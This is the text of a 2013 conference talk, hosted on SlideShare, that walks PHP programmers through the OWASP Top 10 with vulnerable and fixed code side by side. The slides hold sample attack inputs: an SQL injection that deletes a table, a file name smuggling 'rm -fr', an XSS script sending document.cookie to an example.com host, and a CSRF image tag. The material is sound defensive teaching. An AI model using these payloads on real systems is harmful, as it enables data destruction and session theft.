SlideShare une entreprise Scribd logo

OWASP TOP 10 for PHP Programmers

rjsmelo
rjsmelo

Presented at #PHPLX 11 September 2013 The 2013 edition of OWASP (Open Web Application Security Project) top 10 has just been released and unfortunately Injections (not only SQL injection) is still the most common security problem. In this talk we will review the top 10 list of security problems looking at possible attack scenarios and ways to protect against them mostly from a PHP programmer perspective.

Technologie
1  sur  31
Télécharger pour lire hors ligne
Follow this topic: @rjsmelo, #owasp, #php, #appsec OWASP TOP 10 for PHP programmers RICARDO MELO Presented at #PHPLX – 11 September 2013
@rjsmelo 2 RICARDO MELO ● CTO @ DRI ● PHP, Mysql, Linux and lots of other OSS ● ZCE, RHCE, LPI 3, ITIL, etc ● +10 years building (and breaking) things
@rjsmelo 3 About ● 14 Year old academic spin-off ● Pragmatic OSS Orientation ● PHP, Mysql, SugarCRM, Drupal, JavaScript, Linux, etc. ● Crafters, Integrators ● Always looking for software developers – Yes, right now!
1999 - 2013 DRI. Some Rights Reserved . 4 Outline ● OWASP ● OWASP TOP 10 ● What's Next ● Conclusions
1999 - 2013 DRI. Some Rights Reserved . 5 What is OWASP? ● Open Web Application Security Project ● World wide non-for-profit ● Focus on security improvement and awareness ● Very active community ● Lots of projects (you can start yours)
1999 - 2013 DRI. Some Rights Reserved . 6 What is OWASP TOP 10 ● The name is “The Top 10 Most Critical Web Application Risks” ● The focus is awareness ● Released 2003, 2004, 2007, 2010 and 2013 https://www.owasp.org/index.php/Top_10_2013
1999 - 2013 DRI. Some Rights Reserved . 7 Risk ? Thread Agent Attack Vectors Weakness Prevalence Weakness Detectability Technical Impacts Business Impacts Application Specific EASY WIDESPREAD EASY SEVERE Application / Business Specific AVERAGE COMMON AVERAGE MODERATE DIFFICULT UNCOMMON DIFFICULT MINOR
1999 - 2013 DRI. Some Rights Reserved . 8 OWASP TOP 10 - 2013 ● A1 – Injection ● A2 – Broken Authentication and Session Management ● A3 – Cross-site Scripting (XSS) ● A4 – Insecure Direct Object References ● A5 – Security Misconfiguration ● A6 – Sensitive Data Exposure ● A7 – Missing Function Level Access Control ● A8 – Cross Site Request Forgery (CSRF) ● A9 – Using Components with Known Vulnerabilities ● A10 – Unvalidated Redirects and Forwards
1999 - 2013 DRI. Some Rights Reserved . 9 A1 - Injection ● Occurs when untrusted data is sent directly to the interpreter! ● Not only SQL: NoSQL, Ldap, OS, XML, Xpath! ● Never, NEVER trust ANY input!
1999 - 2013 DRI. Some Rights Reserved . 10 A1 – Injection Examples - SQL <?php // prune to sql injection // script.php?start_record=20 $db = new PDO('mysql:host=localhost;dbname=testdb', 'username', 'password'); $stmt = $db->query( "SELECT * FROM some_table limit " . $_REQUEST['start_record'] . ",10"); $result = $stmt->fetchAll(PDO::FETCH_ASSOC); echo function_to_render_result($result); // what if I set record = "1; delete from some_table; -- " <?php // script.php?start_record=20 $db = new PDO('mysql:host=localhost;dbname=testdb', 'username', 'password'); $stmt = $db->prepare("SELECT * FROM some_table limit ?,10"); $stmt->execute(array($_REQUEST['start_record'])); $result = $stmt->fetchAll(PDO::FETCH_ASSOC); echo function_to_render_result($result);
1999 - 2013 DRI. Some Rights Reserved . 11 A1 - Injection Samples - OS <?php // script.php?file=xpto.pdf $fileType = exec( "file " . $_REQUEST['file']); echo $fileType; // but one can try with "xpto.pdf; rm -fr /some/folder" <?php // script.php?file=xpto.pdf $fileType = exec( "file " . escapeshellarg($_REQUEST['file'])); echo $fileType;
1999 - 2013 DRI. Some Rights Reserved . 12 A2 – Broken Authentication and Session Management ● Broken implementations allowing attacker to assume “other” user's identity! ● Can be session hijack/fixation ● Broken authentication ● Or other fails that lead to compromise passwords / keys / session tokens
1999 - 2013 DRI. Some Rights Reserved . 13 A2 – Session Fixation <?php // Prune to session fixation // [ ... ] $userDetails = check_credentials($username, $password); if ( $userDetails !== false ) { $_SESSION['userIsLoggedin'] = true; $_SESSION['userInformation'] = $userDetails; } // [ ... ] <?php // [ ... ] $userDetails = check_credentials($username, $password); if ( $userDetails !== false ) { session_regenerate_id(); $_SESSION['userIsLoggedin'] = true; $_SESSION['userInformation'] = $userDetails; } // [ ... ]
1999 - 2013 DRI. Some Rights Reserved . 14 A3 – Cross-Site Scripting (XSS) ● Whenever untrusted data is sent to the browser without proper validation and escaping! ● XSS allows the attacker to OWN the victims browser and do ... everything! ● Stored, Reflected and DOM based XSS
1999 - 2013 DRI. Some Rights Reserved . 15 A3 – steal user cookie <?php // page prune to XSS // script.php?search=hello $results = some_search_function($_REQUEST['search']); ?> <html> <body> <p>results for : <?= $_REQUEST['search']; ?> <?= render_results($results); ?> </body> </html> // set search to: "<script>document.location='http://www.example.com/precious_cookie ?cookie='+document.cookie</script>" <?php // page prune to XSS // script.php?search=hello $results = some_search_function($_REQUEST['search']); ?> <html> <body> <p>results for : <?= htmlentities($_REQUEST['search'],ENT_COMPAT|ENT_HTML401,'UTF-8'); ?> <?= render_results($results); ?> </body> </html>
1999 - 2013 DRI. Some Rights Reserved . 16 A4 – Insecure Direct Object Reference ● Whenever developer exposes references to internal objects and don't have proper access control. ● Attackers can change the references and access resources that shouldn't be accessible.
1999 - 2013 DRI. Some Rights Reserved . 17 A4 – Access other user account <?php // prune to insecure direct reference // script.php?account=10 $accountId = intval($_REQUEST['account']); $account = new Account($accountId); echo render_account_info($account); // and if I change account to "9" ? <?php // script.php?account=10 $user = new User($_SESSION['userInfo']); $accountId = intval($_REQUEST['account']); $account = new Account($accountId); if ( $account->canRead($user)) { echo render_account_info($account); } else { echo "Access denied"; }
1999 - 2013 DRI. Some Rights Reserved . 18 A5 – Security Misconfiguration ● Often fails in securing the full stack leads to application / servers being compromised. ● Take into consideration other services / applications running in the same infrastructure ● Watch out for outdated software ● Watch out for default accounts
1999 - 2013 DRI. Some Rights Reserved . 19 A6 – Sensitive Data Exposure ● Whenever sensitive data isn't properly protected allowing attackers to steal or modify that information. ● Credit Card fraud, Identity theft, etc! ● Be aware, data should be protected both in transit or on the storage engine (don't forget the backups)
1999 - 2013 DRI. Some Rights Reserved . 20 A7 – Missing Function Level Access Control ● Most applications validate function based access control before displaying options in UI, but fail to validate when the function is accessed. ● Attacker can forge request to functions that shouldn't be available
1999 - 2013 DRI. Some Rights Reserved . 21 A7 – insecure function <?php // prune to insecure function access // script.php?user=john&action=read $userId = $_REQUEST['user']; $action = $_REQUEST['action']; $user = new User($userId); switch($action) { case 'read': echo render_user($user); break; case 'delete': $user->delete(); echo "user Deleted"; break; } // and if I change action to "delete"? <?php $userId = $_REQUEST['user']; $action = $_REQUEST['action']; $loggedUser = new AppUser($_SESSION['userInfo']); $user = new User($userId); switch($action) { case 'read': if ( $user->canRead($loggedUser) ){ echo render_user($user); } break; case 'delete': if ( $user->canDelete($loggedUser) ){ $user->delete(); echo "user Deleted"; } break; }
1999 - 2013 DRI. Some Rights Reserved . 22 A8 – Cross Site Request Forgery (CSRF) ● CSRF forces a victim's browser to send a forged HTTP request to a vulnerable web application (normally taking advantage of an existing user session) ● No difference from user generated requests!
1999 - 2013 DRI. Some Rights Reserved . 23 A8 – delete user <?php // vulnerable app // delete.php?id=123 $id = intval($_REQUEST['id']); $user = new User($id); $loggedUser = new AppUser($_SESSION['userInfo']); if ( $user->canDelete($loggedUser) ){ $user->delete(); } ?> // attackers site: <img src="http://www.example.com/users/delete.php?id=123" /> <?php // vulnerable app $id = intval($_REQUEST['id']); $user = new User($id); $loggedUser = new AppUser($_SESSION['userInfo']); if (validate_token($_REQUEST['token'])) { if ( $user->canDelete($loggedUser) ){ $user->delete(); } }
1999 - 2013 DRI. Some Rights Reserved . 24 A9 – Using Components with know Vulnerabilities ● Whenever you use libraries, frameworks, or other software modules with known vulnerabilities. ● Attackers can leverage this issues to attack your application / server / etc.
1999 - 2013 DRI. Some Rights Reserved . 25 A10 – Unvalidated Redirects and Forwards ● Web application often redirects users to other pages, using untrusted data to determine the destination pages. ● Atackers can redirect victims to phishing or malware pages or use forwards to access unauthorized pages.
1999 - 2013 DRI. Some Rights Reserved . 26 A10 – “simple” Forward <?php class someController extends baseController { public function preFunction($args,$action) { $this->checkAccess($args, $action); } public function indexAction($args) { // [...] do something here if ( $args['callback'] && method_exists($this,$args['callback'])){ unset($args['callback']); call_user_func_array(array($this,$args['callback']),$args); } return $response; } public function destroyAction($args) { $this->selfTerminate(); } } if ( $args['callback'] && method_exists($this,$args['callback'])){ $this->preFunction($args,$args['callback']); unset($args['callback']); call_user_func_array(array($this,$args['callback']),$args); }
1999 - 2013 DRI. Some Rights Reserved . 27 What's Next For PHP Programmers ● OWASP – http://goo.gl/lVRRY ● Cheat Sheets – http://goo.gl/lVRRY ● OWASP Zed Attack Proxy – http://goo.gl/QE5v1H ● OWASP Books – free – http://goo.gl/aLx1q2
1999 - 2013 DRI. Some Rights Reserved . 28 Conclusions ● Keep the application secure is a continuous process ● Avoiding the TOP 10 Risks don't make your application secure, but is already a HUGE step forward. ● Don't trust ANY input! Escape every output!
Thank you
Follow this topic: @rjsmelo, #owasp, #php, #appsec QA Feedback: https://joind.in/9107
www.dri-global.com @rjsmelo ricardo.melo@dri-global.com

Recommandé

Secure Coding for Java
Secure Coding for JavaSecure Coding for Java
Secure Coding for JavaSébastien GIORIA
 
Monitoring with Prometheus
Monitoring with PrometheusMonitoring with Prometheus
Monitoring with PrometheusShiao-An Yuan
 
APIsecure 2023 - What if privacy had an API?, Sean Falconer (Skyflow)
APIsecure 2023 - What if privacy had an API?, Sean Falconer (Skyflow)APIsecure 2023 - What if privacy had an API?, Sean Falconer (Skyflow)
APIsecure 2023 - What if privacy had an API?, Sean Falconer (Skyflow)apidays
 
DumpsCafe Microsoft-AZ-104 Free Exam Dumps Demo.pdf
DumpsCafe Microsoft-AZ-104 Free Exam Dumps Demo.pdfDumpsCafe Microsoft-AZ-104 Free Exam Dumps Demo.pdf
DumpsCafe Microsoft-AZ-104 Free Exam Dumps Demo.pdfDumps Cafe
 
How Atlassian Scales Bitbucket Data Center on AWS
How Atlassian Scales Bitbucket Data Center on AWSHow Atlassian Scales Bitbucket Data Center on AWS
How Atlassian Scales Bitbucket Data Center on AWSAtlassian
 
APIsecure 2023 - Learning from a decade of API breaches and why application-c...
APIsecure 2023 - Learning from a decade of API breaches and why application-c...APIsecure 2023 - Learning from a decade of API breaches and why application-c...
APIsecure 2023 - Learning from a decade of API breaches and why application-c...apidays
 
An Introduction To REST API
An Introduction To REST APIAn Introduction To REST API
An Introduction To REST APIAniruddh Bhilvare
 
API for Beginners
API for BeginnersAPI for Beginners
API for BeginnersGustavo De Vita
 

Recommandé

Secure Coding for Java
Secure Coding for JavaSecure Coding for Java
Secure Coding for JavaSébastien GIORIA
 
Monitoring with Prometheus
Monitoring with PrometheusMonitoring with Prometheus
Monitoring with PrometheusShiao-An Yuan
 
APIsecure 2023 - What if privacy had an API?, Sean Falconer (Skyflow)
APIsecure 2023 - What if privacy had an API?, Sean Falconer (Skyflow)APIsecure 2023 - What if privacy had an API?, Sean Falconer (Skyflow)
APIsecure 2023 - What if privacy had an API?, Sean Falconer (Skyflow)apidays
 
DumpsCafe Microsoft-AZ-104 Free Exam Dumps Demo.pdf
DumpsCafe Microsoft-AZ-104 Free Exam Dumps Demo.pdfDumpsCafe Microsoft-AZ-104 Free Exam Dumps Demo.pdf
DumpsCafe Microsoft-AZ-104 Free Exam Dumps Demo.pdfDumps Cafe
 
How Atlassian Scales Bitbucket Data Center on AWS
How Atlassian Scales Bitbucket Data Center on AWSHow Atlassian Scales Bitbucket Data Center on AWS
How Atlassian Scales Bitbucket Data Center on AWSAtlassian
 
APIsecure 2023 - Learning from a decade of API breaches and why application-c...
APIsecure 2023 - Learning from a decade of API breaches and why application-c...APIsecure 2023 - Learning from a decade of API breaches and why application-c...
APIsecure 2023 - Learning from a decade of API breaches and why application-c...apidays
 
An Introduction To REST API
An Introduction To REST APIAn Introduction To REST API
An Introduction To REST APIAniruddh Bhilvare
 
API for Beginners
API for BeginnersAPI for Beginners
API for BeginnersGustavo De Vita
 
Kubernetes Secrets Management on Production with Demo
Kubernetes Secrets Management on Production with DemoKubernetes Secrets Management on Production with Demo
Kubernetes Secrets Management on Production with DemoOpsta
 
APIsecure 2023 - Approaching Multicloud API Security USing Metacloud, David L...
APIsecure 2023 - Approaching Multicloud API Security USing Metacloud, David L...APIsecure 2023 - Approaching Multicloud API Security USing Metacloud, David L...
APIsecure 2023 - Approaching Multicloud API Security USing Metacloud, David L...apidays
 
Container Security Deep Dive & Kubernetes
Container Security Deep Dive & Kubernetes Container Security Deep Dive & Kubernetes
Container Security Deep Dive & Kubernetes Aqua Security
 
Rest API Security
Rest API SecurityRest API Security
Rest API SecurityStormpath
 
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim HegazyHackIT Ukraine
 
Fundamentos de GIt y Github
Fundamentos de GIt y GithubFundamentos de GIt y Github
Fundamentos de GIt y GithubJavier Latorre López-Villalta
 
Terraform
TerraformTerraform
TerraformPhil Wilkins
 
Harnessing the Power of AI in AWS Pentesting.pdf
Harnessing the Power of AI in AWS Pentesting.pdfHarnessing the Power of AI in AWS Pentesting.pdf
Harnessing the Power of AI in AWS Pentesting.pdfMike Felch
 
The Diamond Model for Intrusion Analysis - Threat Intelligence
The Diamond Model for Intrusion Analysis - Threat IntelligenceThe Diamond Model for Intrusion Analysis - Threat Intelligence
The Diamond Model for Intrusion Analysis - Threat IntelligenceThreatConnect
 
K8s security best practices
K8s security best practicesK8s security best practices
K8s security best practicesSharon Vendrov
 
DerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedDerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedWill Schroeder
 
Pentesting ReST API
Pentesting ReST APIPentesting ReST API
Pentesting ReST APINutan Kumar Panda
 
Kubernetes security
Kubernetes securityKubernetes security
Kubernetes securityThomas Fricke
 
Web api
Web apiWeb api
Web apiSudhakar Sharma
 
Understanding The Known: OWASP A9 Using Components With Known Vulnerabilities
Understanding The Known: OWASP A9 Using Components With Known VulnerabilitiesUnderstanding The Known: OWASP A9 Using Components With Known Vulnerabilities
Understanding The Known: OWASP A9 Using Components With Known VulnerabilitiesAnant Shrivastava
 
Ejercicios de HTML
Ejercicios de HTMLEjercicios de HTML
Ejercicios de HTMLAbrirllave
 
Gestion de formularios php
Gestion de formularios phpGestion de formularios php
Gestion de formularios phpwilliamCG27
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS VectorsRodolfo Assis (Brute)
 
Welcome to the Jungle: Pentesting AWS
Welcome to the Jungle: Pentesting AWSWelcome to the Jungle: Pentesting AWS
Welcome to the Jungle: Pentesting AWSMike Felch
 
Monitoring Kubernetes with Prometheus
Monitoring Kubernetes with PrometheusMonitoring Kubernetes with Prometheus
Monitoring Kubernetes with PrometheusGrafana Labs
 
Owasp & php
Owasp & phpOwasp & php
Owasp & phpAhmed Kamel Taha
 
Doctrine For Beginners
Doctrine For BeginnersDoctrine For Beginners
Doctrine For BeginnersJonathan Wage
 

Contenu connexe

Tendances

Kubernetes Secrets Management on Production with Demo
Kubernetes Secrets Management on Production with DemoKubernetes Secrets Management on Production with Demo
Kubernetes Secrets Management on Production with DemoOpsta
 
APIsecure 2023 - Approaching Multicloud API Security USing Metacloud, David L...
APIsecure 2023 - Approaching Multicloud API Security USing Metacloud, David L...APIsecure 2023 - Approaching Multicloud API Security USing Metacloud, David L...
APIsecure 2023 - Approaching Multicloud API Security USing Metacloud, David L...apidays
 
Container Security Deep Dive & Kubernetes
Container Security Deep Dive & Kubernetes Container Security Deep Dive & Kubernetes
Container Security Deep Dive & Kubernetes Aqua Security
 
Rest API Security
Rest API SecurityRest API Security
Rest API SecurityStormpath
 
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim HegazyHackIT Ukraine
 
Harnessing the Power of AI in AWS Pentesting.pdf
Harnessing the Power of AI in AWS Pentesting.pdfHarnessing the Power of AI in AWS Pentesting.pdf
Harnessing the Power of AI in AWS Pentesting.pdfMike Felch
 
The Diamond Model for Intrusion Analysis - Threat Intelligence
The Diamond Model for Intrusion Analysis - Threat IntelligenceThe Diamond Model for Intrusion Analysis - Threat Intelligence
The Diamond Model for Intrusion Analysis - Threat IntelligenceThreatConnect
 
K8s security best practices
K8s security best practicesK8s security best practices
K8s security best practicesSharon Vendrov
 
DerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedDerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedWill Schroeder
 
Understanding The Known: OWASP A9 Using Components With Known Vulnerabilities
Understanding The Known: OWASP A9 Using Components With Known VulnerabilitiesUnderstanding The Known: OWASP A9 Using Components With Known Vulnerabilities
Understanding The Known: OWASP A9 Using Components With Known VulnerabilitiesAnant Shrivastava
 
Ejercicios de HTML
Ejercicios de HTMLEjercicios de HTML
Ejercicios de HTMLAbrirllave
 
Gestion de formularios php
Gestion de formularios phpGestion de formularios php
Gestion de formularios phpwilliamCG27
 
Welcome to the Jungle: Pentesting AWS
Welcome to the Jungle: Pentesting AWSWelcome to the Jungle: Pentesting AWS
Welcome to the Jungle: Pentesting AWSMike Felch
 
Monitoring Kubernetes with Prometheus
Monitoring Kubernetes with PrometheusMonitoring Kubernetes with Prometheus
Monitoring Kubernetes with PrometheusGrafana Labs
 

Tendances (20)

Kubernetes Secrets Management on Production with Demo
Kubernetes Secrets Management on Production with DemoKubernetes Secrets Management on Production with Demo
Kubernetes Secrets Management on Production with Demo
 
APIsecure 2023 - Approaching Multicloud API Security USing Metacloud, David L...
APIsecure 2023 - Approaching Multicloud API Security USing Metacloud, David L...APIsecure 2023 - Approaching Multicloud API Security USing Metacloud, David L...
APIsecure 2023 - Approaching Multicloud API Security USing Metacloud, David L...
 
Container Security Deep Dive & Kubernetes
Container Security Deep Dive & Kubernetes Container Security Deep Dive & Kubernetes
Container Security Deep Dive & Kubernetes
 
Rest API Security
Rest API SecurityRest API Security
Rest API Security
 
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
 
Fundamentos de GIt y Github
Fundamentos de GIt y GithubFundamentos de GIt y Github
Fundamentos de GIt y Github
 
Terraform
TerraformTerraform
Terraform
 
Harnessing the Power of AI in AWS Pentesting.pdf
Harnessing the Power of AI in AWS Pentesting.pdfHarnessing the Power of AI in AWS Pentesting.pdf
Harnessing the Power of AI in AWS Pentesting.pdf
 
The Diamond Model for Intrusion Analysis - Threat Intelligence
The Diamond Model for Intrusion Analysis - Threat IntelligenceThe Diamond Model for Intrusion Analysis - Threat Intelligence
The Diamond Model for Intrusion Analysis - Threat Intelligence
 
K8s security best practices
K8s security best practicesK8s security best practices
K8s security best practices
 
DerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedDerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting Revisited
 
Pentesting ReST API
Pentesting ReST APIPentesting ReST API
Pentesting ReST API
 
Kubernetes security
Kubernetes securityKubernetes security
Kubernetes security
 
Web api
Web apiWeb api
Web api
 
Understanding The Known: OWASP A9 Using Components With Known Vulnerabilities
Understanding The Known: OWASP A9 Using Components With Known VulnerabilitiesUnderstanding The Known: OWASP A9 Using Components With Known Vulnerabilities
Understanding The Known: OWASP A9 Using Components With Known Vulnerabilities
 
Ejercicios de HTML
Ejercicios de HTMLEjercicios de HTML
Ejercicios de HTML
 
Gestion de formularios php
Gestion de formularios phpGestion de formularios php
Gestion de formularios php
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors
 
Welcome to the Jungle: Pentesting AWS
Welcome to the Jungle: Pentesting AWSWelcome to the Jungle: Pentesting AWS
Welcome to the Jungle: Pentesting AWS
 
Monitoring Kubernetes with Prometheus
Monitoring Kubernetes with PrometheusMonitoring Kubernetes with Prometheus
Monitoring Kubernetes with Prometheus
 

Similaire à OWASP TOP 10 for PHP Programmers

Doctrine For Beginners
Doctrine For BeginnersDoctrine For Beginners
Doctrine For BeginnersJonathan Wage
 
Using Geeklog as a Web Application Framework
Using Geeklog as a Web Application FrameworkUsing Geeklog as a Web Application Framework
Using Geeklog as a Web Application FrameworkDirk Haun
 
Redis & ZeroMQ: How to scale your application
Redis & ZeroMQ: How to scale your applicationRedis & ZeroMQ: How to scale your application
Redis & ZeroMQ: How to scale your applicationrjsmelo
 
CI/CD on Windows-Based Environments - Noam Shochat, eToro - DevOpsDays Tel Av...
CI/CD on Windows-Based Environments - Noam Shochat, eToro - DevOpsDays Tel Av...CI/CD on Windows-Based Environments - Noam Shochat, eToro - DevOpsDays Tel Av...
CI/CD on Windows-Based Environments - Noam Shochat, eToro - DevOpsDays Tel Av...DevOpsDays Tel Aviv
 
Intro to Php Security
Intro to Php SecurityIntro to Php Security
Intro to Php SecurityDave Ross
 
Create a res tful services api in php.
Create a res tful services api in php.Create a res tful services api in php.
Create a res tful services api in php.Adeoye Akintola
 
Single Page Web Apps As WordPress Admin Interfaces Using AngularJS & The Word...
Single Page Web Apps As WordPress Admin Interfaces Using AngularJS & The Word...Single Page Web Apps As WordPress Admin Interfaces Using AngularJS & The Word...
Single Page Web Apps As WordPress Admin Interfaces Using AngularJS & The Word...Caldera Labs
 
Ditching JQuery
Ditching JQueryDitching JQuery
Ditching JQueryhowlowck
 
Creating REST Applications with the Slim Micro-Framework by Vikram Vaswani
Creating REST Applications with the Slim Micro-Framework by Vikram VaswaniCreating REST Applications with the Slim Micro-Framework by Vikram Vaswani
Creating REST Applications with the Slim Micro-Framework by Vikram Vaswanivvaswani
 
RESTful API 제대로 만들기
RESTful API 제대로 만들기RESTful API 제대로 만들기
RESTful API 제대로 만들기Juwon Kim
 
RedisConf18 - Writing modular & encapsulated Redis code
RedisConf18 - Writing modular & encapsulated Redis codeRedisConf18 - Writing modular & encapsulated Redis code
RedisConf18 - Writing modular & encapsulated Redis codeRedis Labs
 
Webinar: AngularJS and the WordPress REST API
Webinar: AngularJS and the WordPress REST APIWebinar: AngularJS and the WordPress REST API
Webinar: AngularJS and the WordPress REST APIWP Engine
 
Webinar: AngularJS and the WordPress REST API
Webinar: AngularJS and the WordPress REST APIWebinar: AngularJS and the WordPress REST API
Webinar: AngularJS and the WordPress REST APIWP Engine UK
 
PHP and Rich Internet Applications
PHP and Rich Internet ApplicationsPHP and Rich Internet Applications
PHP and Rich Internet Applicationselliando dias
 

Similaire à OWASP TOP 10 for PHP Programmers (20)

Owasp & php
Owasp & phpOwasp & php
Owasp & php
 
Doctrine For Beginners
Doctrine For BeginnersDoctrine For Beginners
Doctrine For Beginners
 
Introduction to angular js
Introduction to angular jsIntroduction to angular js
Introduction to angular js
 
Using Geeklog as a Web Application Framework
Using Geeklog as a Web Application FrameworkUsing Geeklog as a Web Application Framework
Using Geeklog as a Web Application Framework
 
Redis & ZeroMQ: How to scale your application
Redis & ZeroMQ: How to scale your applicationRedis & ZeroMQ: How to scale your application
Redis & ZeroMQ: How to scale your application
 
CI/CD on Windows-Based Environments - Noam Shochat, eToro - DevOpsDays Tel Av...
CI/CD on Windows-Based Environments - Noam Shochat, eToro - DevOpsDays Tel Av...CI/CD on Windows-Based Environments - Noam Shochat, eToro - DevOpsDays Tel Av...
CI/CD on Windows-Based Environments - Noam Shochat, eToro - DevOpsDays Tel Av...
 
Fatc
FatcFatc
Fatc
 
Complex Sites with Silex
Complex Sites with SilexComplex Sites with Silex
Complex Sites with Silex
 
Intro to Php Security
Intro to Php SecurityIntro to Php Security
Intro to Php Security
 
REST API for your WP7 App
REST API for your WP7 AppREST API for your WP7 App
REST API for your WP7 App
 
Create a res tful services api in php.
Create a res tful services api in php.Create a res tful services api in php.
Create a res tful services api in php.
 
Single Page Web Apps As WordPress Admin Interfaces Using AngularJS & The Word...
Single Page Web Apps As WordPress Admin Interfaces Using AngularJS & The Word...Single Page Web Apps As WordPress Admin Interfaces Using AngularJS & The Word...
Single Page Web Apps As WordPress Admin Interfaces Using AngularJS & The Word...
 
Ditching JQuery
Ditching JQueryDitching JQuery
Ditching JQuery
 
Creating REST Applications with the Slim Micro-Framework by Vikram Vaswani
Creating REST Applications with the Slim Micro-Framework by Vikram VaswaniCreating REST Applications with the Slim Micro-Framework by Vikram Vaswani
Creating REST Applications with the Slim Micro-Framework by Vikram Vaswani
 
RESTful API 제대로 만들기
RESTful API 제대로 만들기RESTful API 제대로 만들기
RESTful API 제대로 만들기
 
RedisConf18 - Writing modular & encapsulated Redis code
RedisConf18 - Writing modular & encapsulated Redis codeRedisConf18 - Writing modular & encapsulated Redis code
RedisConf18 - Writing modular & encapsulated Redis code
 
Webinar: AngularJS and the WordPress REST API
Webinar: AngularJS and the WordPress REST APIWebinar: AngularJS and the WordPress REST API
Webinar: AngularJS and the WordPress REST API
 
Webinar: AngularJS and the WordPress REST API
Webinar: AngularJS and the WordPress REST APIWebinar: AngularJS and the WordPress REST API
Webinar: AngularJS and the WordPress REST API
 
PHP and Rich Internet Applications
PHP and Rich Internet ApplicationsPHP and Rich Internet Applications
PHP and Rich Internet Applications
 
Drupal 8 migrate!
Drupal 8 migrate!Drupal 8 migrate!
Drupal 8 migrate!
 

Plus de rjsmelo

Docker and Running multiple versions of PHP @ CareerZoo Dublin
Docker and Running multiple versions of PHP @ CareerZoo DublinDocker and Running multiple versions of PHP @ CareerZoo Dublin
Docker and Running multiple versions of PHP @ CareerZoo Dublinrjsmelo
 
Docker & PHP - Practical use case
Docker & PHP - Practical use caseDocker & PHP - Practical use case
Docker & PHP - Practical use caserjsmelo
 
PHP QA Tools
PHP QA ToolsPHP QA Tools
PHP QA Toolsrjsmelo
 
PHPUnit your bug exterminator
PHPUnit your bug exterminatorPHPUnit your bug exterminator
PHPUnit your bug exterminatorrjsmelo
 
A Certificação LPI
A Certificação LPIA Certificação LPI
A Certificação LPIrjsmelo
 
PHP and Application Security - OWASP Road Show 2013
PHP and Application Security - OWASP Road Show 2013PHP and Application Security - OWASP Road Show 2013
PHP and Application Security - OWASP Road Show 2013rjsmelo
 
PHP e a (in)segurança de aplicações
PHP e a (in)segurança de aplicaçõesPHP e a (in)segurança de aplicações
PHP e a (in)segurança de aplicaçõesrjsmelo
 

Plus de rjsmelo (7)

Docker and Running multiple versions of PHP @ CareerZoo Dublin
Docker and Running multiple versions of PHP @ CareerZoo DublinDocker and Running multiple versions of PHP @ CareerZoo Dublin
Docker and Running multiple versions of PHP @ CareerZoo Dublin
 
Docker & PHP - Practical use case
Docker & PHP - Practical use caseDocker & PHP - Practical use case
Docker & PHP - Practical use case
 
PHP QA Tools
PHP QA ToolsPHP QA Tools
PHP QA Tools
 
PHPUnit your bug exterminator
PHPUnit your bug exterminatorPHPUnit your bug exterminator
PHPUnit your bug exterminator
 
A Certificação LPI
A Certificação LPIA Certificação LPI
A Certificação LPI
 
PHP and Application Security - OWASP Road Show 2013
PHP and Application Security - OWASP Road Show 2013PHP and Application Security - OWASP Road Show 2013
PHP and Application Security - OWASP Road Show 2013
 
PHP e a (in)segurança de aplicações
PHP e a (in)segurança de aplicaçõesPHP e a (in)segurança de aplicações
PHP e a (in)segurança de aplicações
 

Dernier

"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...Zilliz
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobeapidays
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Zilliz
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodJuan lago vázquez
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businesspanagenda
 
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
